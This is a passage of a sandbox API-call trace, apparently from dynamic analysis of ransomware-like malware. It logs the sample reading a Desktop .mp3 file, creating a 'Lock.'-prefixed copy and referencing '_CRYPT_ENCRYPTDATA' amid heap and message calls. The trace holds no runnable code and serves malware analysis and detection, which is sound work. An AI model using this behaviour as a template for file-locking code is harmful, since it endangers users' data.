hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0185.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0185.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0185.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0185.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0185.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0185.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.167] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/i48aq9pLiKOVw_egcT3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i48aq9plikovw_egct3.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0185.167] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.167] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0185.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0185.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0185.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0185.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0185.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0185.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0185.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.169] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0185.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0185.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0185.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0185.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0185.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0185.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0185.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.i48aq9pLiKOVw_egcT3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.i48aq9plikovw_egct3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0185.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0185.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0185.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0185.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0185.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0185.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0185.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0185.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0185.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0185.306] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0185.307] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xe879, lpOverlapped=0x0) returned 1 [0185.311] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0185.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe879) returned 0x2f24018 [0185.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0185.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0185.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0185.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0185.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe879) returned 0x2f328a0 [0185.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0185.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.319] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0185.319] TranslateMessage (lpMsg=0x8cf708) returned 0 [0185.320] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0185.320] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0185.320] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0185.320] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0185.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe879) returned 0x2f24018 [0185.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0185.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0185.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0185.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0185.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.323] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0185.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0185.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0185.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe879) returned 0x2f24018 [0185.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0185.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0185.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0185.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0185.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe879) returned 0x3be0048 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0185.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0185.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0185.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 